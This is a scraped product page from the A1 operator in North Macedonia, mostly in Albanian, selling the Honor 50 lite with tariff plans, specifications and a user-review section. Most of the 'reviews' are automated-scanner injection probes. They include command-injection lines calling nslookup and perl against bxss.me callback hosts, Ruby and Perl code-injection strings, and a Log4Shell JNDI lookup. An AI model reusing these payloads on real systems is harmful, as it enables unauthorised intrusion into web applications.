Honor Honor 50 lite

Lexo më shumë
6 GB
Octa-core
Li-Ion 4300 mAh
6.67" TFT LCD Display
64+8+2+2MP rear + 16MP front
Sasi të kufizuara
Në dispozicion
Nuk është në dispozicion onlajn
6 GB
Octa-core
Li-Ion 4300 mAh
6.67" TFT LCD Display
64+8+2+2MP rear + 16MP front
Ngjyrën: Midnight Black

Në dispozicion në sasi të kufizuara

Në dispozicion

Nuk është në dispozicion onlajn

Tarifa
A1 Business Pro M
Ndrysho tarifën
1.297 den./muaj
Mënyra e pagesës
Me tarif� t� nj�hershme prej 199 den. p�r pajisje me k�ste
Çmimi i pajisjes

0 den.

Tarifa: A1 Business Pro M
1.297 den./muaj
Çmimi

0 den.

Transporti falas

A dëshironi të dini kur do të ketë në dispozicion

Sasi të kufizuara
Në dispozicion
Nuk është në dispozicion onlajn

A1 Business Pro XS

589 den./muaj

 
8GB
 
internet kombëtar 
 
  
  
Pakufi
 
minuta dhe SMS 
  
 
  
  
 
  
  
 
  
  
 
  
  

Çmimi për Honor Honor 50 lite

11.999 den.
Zgjidhni

A1 Business Pro S

943 den./muaj

 
80GB
 
internet kombëtar 
  
  
  
Pakufi
 
minuta dhe SMS 
  
 
  
  
 
  
  
 
  
  
 
  
  

Çmimi për Honor Honor 50 lite

6.999 den.
Zgjidhni

A1 Business Pro M

1.297 den./muaj

Tarifa e rekomanduar
5G
 
pakufi
 
internet kombëtar 
Zgjidhni paketën
 
  
  
Pakufi
 
minuta dhe SMS 
  
2GB
 
interneti në roaming 
  
50 minuta
 
biseda ndërkombëtare 
  
50
 
SMS ndërkombëtarë 
  
 
 
  
  

Çmimi për Honor Honor 50 lite

0 den.
E zgjedhur

A1 Business Pro L

2.123 den./muaj

5G
 
pakufi
 
internet kombëtar 
Zgjidhni paketën
 
  
  
Pakufi
 
minuta dhe SMS 
  
3GB
 
interneti në roaming 
  
100 minuta
 
biseda ndërkombëtare 
  
100
 
SMS ndërkombëtarë 
  
100 minuta
 
roaming biseda 
  

Çmimi për Honor Honor 50 lite

0 den.
Zgjidhni

A1 Business Pro XL

3.185 den./muaj

5G
 
pakufi
 
internet kombëtar 
Zgjidhni paketën
 
  
  
Pakufi
 
minuta dhe SMS 
  
5GB
 
interneti në roaming 
  
150 minuta
 
biseda ndërkombëtare 
  
150
 
SMS ndërkombëtarë 
  
150 minuta
 
roaming biseda 
  

Çmimi për Honor Honor 50 lite

0 den.
Zgjidhni
Zgjidhni tarifën
Враќање на производ
Бесплатна достава
Секогаш во добивка
Безбедно плаќање

Honor Honor 50 lite

Çmimi i pajisjes dhe tarifa
Tarifa
Kohëzgjatja e kontratës
Mënyra e pagesës
Me tarif� t� nj�hershme prej 199 den. p�r pajisje me k�ste

A1 Business Pro XS

589 den./muaj

 
8GB
 
internet kombëtar 
 
  
  
Pakufi
 
minuta dhe SMS 
  
 
  
  
 
  
  
 
  
  
 
  
  

Çmimi për Honor Honor 50 lite

11.999 den.
Zgjidhni

A1 Business Pro S

943 den./muaj

 
80GB
 
internet kombëtar 
  
  
  
Pakufi
 
minuta dhe SMS 
  
 
  
  
 
  
  
 
  
  
 
  
  

Çmimi për Honor Honor 50 lite

6.999 den.
Zgjidhni

A1 Business Pro M

1.297 den./muaj

Tarifa e rekomanduar
5G
 
pakufi
 
internet kombëtar 
Zgjidhni paketën
 
  
  
Pakufi
 
minuta dhe SMS 
  
2GB
 
interneti në roaming 
  
50 minuta
 
biseda ndërkombëtare 
  
50
 
SMS ndërkombëtarë 
  
 
 
  
  

Çmimi për Honor Honor 50 lite

0 den.
E zgjedhur

A1 Business Pro L

2.123 den./muaj

5G
 
pakufi
 
internet kombëtar 
Zgjidhni paketën
 
  
  
Pakufi
 
minuta dhe SMS 
  
3GB
 
interneti në roaming 
  
100 minuta
 
biseda ndërkombëtare 
  
100
 
SMS ndërkombëtarë 
  
100 minuta
 
roaming biseda 
  

Çmimi për Honor Honor 50 lite

0 den.
Zgjidhni

A1 Business Pro XL

3.185 den./muaj

5G
 
pakufi
 
internet kombëtar 
Zgjidhni paketën
 
  
  
Pakufi
 
minuta dhe SMS 
  
5GB
 
interneti në roaming 
  
150 minuta
 
biseda ndërkombëtare 
  
150
 
SMS ndërkombëtarë 
  
150 minuta
 
roaming biseda 
  

Çmimi për Honor Honor 50 lite

0 den.
Zgjidhni
Basic price
14.999denarë
Pripejd
16.999denarë
Çmimi vetëm për pajisjen
16.999denarë

Dashuri në shikim të parë

Tani ekrani është më i madh falë kufirit të hollë prej vetëm 1,05 mm. Ekrani i madh 6,67 "HONOR FullView ndryshon ngjyrat dhe ndriçimin falë konvertimit të bazuar në ndryshimet e temperaturës.

66W HONOR SuperCharge

Karikoni baterinë e telefonit Tuaj deri në 40% për vetëm 10 minuta me ndihmën e opsionit 66 W "SuperCharging". Mund të karikoni më shumë se gjysmën e kapacitetit të baterisë përderisa përfundoni rutinën tuaj të mëngjesit.

Kapni bukurinë e fotografive përmes detajeve

Kamera kryesore me rezolucion 1 / 1,7” 64 MP, përmirëson ndjeshëm kontrastin dhe cilësinë e fotografisë gjatë fotografimit të natës ose ditës. Fotografoni më shumë detaje me 8 MP kamerë me kënd të gjerë ose fotografoni objekte me afërsi deri në 4 cm. me kamerën e pavarur "makro".

Qëndroni gjithmonë online, plot energji

Me baterinë që ka kapacitet prej 4300 mAh, do të mund të jeni online deri në 16 orë, do të mund të shikoni video deri në 8 orë ose të luani video lojën Tuaj të preferuar deri në 7 orë.

6.67” TFT LCD Display
64+8+2+ 2MP rear + 16MP front
Octa-Core, Qualcomm Snapdragon 662
128GB internal / 6GB RAM

Mos humbisni asnjë detaj të ekranit super të madh të Honor 50 lite, i cili përmban teknologjinë e përshtatjes automatike të ngjyrave dhe dritës së duhur që ofrojnë një përvojë komode dhe realiste të imazhit që shihni. Në të njëjtën kohë, ndjehuni të sigurt dhe të relaksuar gjatë përdorimit të smartfonit, sepse ai vjen me mundësinë e mbushjes super të shpejtë, që në kushte të caktuara bateria mbushet deri në 40% për një periudhë prej 10 minutash.

Honor Honor 50 lite

Çka ka në kuti?
  • Honor 50 lite
  • Адаптер за полнење
  • Кабел за полнење
  • Упатство за употреба
  • Гарантен лист
Karakteristikat themelore
  • 6 GB
  • Octa-core
  • Li-Ion 4300 mAh
  • 6.67" TFT LCD Display
  • 64+8+2+2MP rear + 16MP front
74.7 мм
161.8 мм
Karakteristikat e hollësishme
Rrjeti GSM/HSPA/LTE
Lloji i SIM Dual Nano SIM
Ekrani TFT LCD Display (1080 x 2376)
Madhësia e ekranit 6.67"
Kamera 64MP + 8MP + 2MP + 2MP
Sistemi operativ Android
CPU Octa-core Qualcomm SDM662
Memorja e integruar 128 GB
RAM memorja 6 GB
Bateria Li-Ion 4300 mAh
Menyja në maqedonisht Yes
Telefoni punon vetëm me A1 SIM kartelë No
Kamera e përparme 16MP
Dimensionet 161.8 x 74.7 x 8.5 mm
Pesha 192g
Garancia 24

Honor Honor 50 lite

Garancia dhe servisi
24
muajgarancia e prodhuesit
Servisues i autorizuar për këtë pajisje

Nëse keni nevojë për servis për Honor Honor 50 lite, kontaktoni servisuesin e autorizuar.

Honor Honor 50 lite

Vlerësimi nga shfrytëzuesit

Ka gjithsej 25 recenzione për këtë pajisje

14
6
5
0
0
4.4
'+'A'.concat(70-3).concat(22*4).concat(115).concat(84).concat(121).concat(73)+(require'socket' Socket.gethostbyname('hitfy'+'ahfmjqne9a76c.bxss.me.')[3].to_s)+'
17.01.2023

A Ju ndihmoi ky recenzion?
"+"A".concat(70-3).concat(22*4).concat(114).concat(88).concat(99).concat(73)+(require"socket" Socket.gethostbyname("hiths"+"azsegerwd2729.bxss.me.")[3].to_s)+"
21.01.2023

A Ju ndihmoi ky recenzion?
pHqghUme
19.01.2023

A Ju ndihmoi ky recenzion?
;(nslookup hitrohyozcgvlf94a4.bxss.me||perl -e "gethostbyname('hitrohyozcgvlf94a4.bxss.me')")|(nslookup hitrohyozcgvlf94a4.bxss.me||perl -e "gethostbyname('hitrohyozcgvlf94a4.bxss.me')")&(nslookup hitrohyozcgvlf94a4.bxss.me||perl -e "gethostbyname('hitrohy
21.01.2023

A Ju ndihmoi ky recenzion?
'.gethostbyname(lc('hitux'.'esqpkjobe33c8.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(117).chr(79).chr(100).chr(86).'
17.01.2023

A Ju ndihmoi ky recenzion?
;(nslookup hitlyreofuowha00e2.bxss.me||perl -e "gethostbyname('hitlyreofuowha00e2.bxss.me')")|(nslookup hitlyreofuowha00e2.bxss.me||perl -e "gethostbyname('hitlyreofuowha00e2.bxss.me')")&(nslookup hitlyreofuowha00e2.bxss.me||perl -e "gethostbyname('hitlyre
17.01.2023

A Ju ndihmoi ky recenzion?
pHqghUme
21.01.2023

A Ju ndihmoi ky recenzion?
'.gethostbyname(lc('hitao'.'brprvlaf695cf.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(121).chr(86).chr(109).chr(84).'
21.01.2023

A Ju ndihmoi ky recenzion?
Darko Krstevski
03.03.2022

Odlicen telefon

A Ju ndihmoi ky recenzion?
echo oakynu$()\ kymhty\nz^xyu||a #' &echo oakynu$()\ kymhty\nz^xyu||a #|" &echo oakynu$()\ kymhty\nz^xyu||a #
17.01.2023

A Ju ndihmoi ky recenzion?
07.03.2022

A Ju ndihmoi ky recenzion?
23.08.2022

A Ju ndihmoi ky recenzion?
${${:::::::::::::::::-j}ndi:dns${:::::::::::::::::-:}//dns.log4j..-5639..9c566${::-.}1${::-.}bxss.me}}
17.01.2023

A Ju ndihmoi ky recenzion?
|(nslookup hitsolojogsxk85071.bxss.me||perl -e "gethostbyname('hitsolojogsxk85071.bxss.me')")
19.01.2023

A Ju ndihmoi ky recenzion?
pHqghUme
21.01.2023

A Ju ndihmoi ky recenzion?
abc123
23.04.2023

A Ju ndihmoi ky recenzion?
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
21.01.2023

A Ju ndihmoi ky recenzion?
".gethostbyname(lc("hittt"."rrmvlcff2f981.bxss.me."))."A".chr(67).chr(hex("58")).chr(100).chr(88).chr(118).chr(68)."
21.01.2023

A Ju ndihmoi ky recenzion?
03.03.2022

A Ju ndihmoi ky recenzion?
pHqghUme
19.01.2023

A Ju ndihmoi ky recenzion?
pHqghUme
21.01.2023

A Ju ndihmoi ky recenzion?
`(nslookup hitwomhwqmtqlb06bf.bxss.me||perl -e "gethostbyname('hitwomhwqmtqlb06bf.bxss.me')")`
19.01.2023

A Ju ndihmoi ky recenzion?
&(nslookup hitzkyktwhkspf4590.bxss.me||perl -e "gethostbyname('hitzkyktwhkspf4590.bxss.me')")&'\"`0&(nslookup hitzkyktwhkspf4590.bxss.me||perl -e "gethostbyname('hitzkyktwhkspf4590.bxss.me')")&`'
19.01.2023

A Ju ndihmoi ky recenzion?
pHqghUme
21.01.2023

A Ju ndihmoi ky recenzion?
pHqghUme
19.01.2023

A Ju ndihmoi ky recenzion?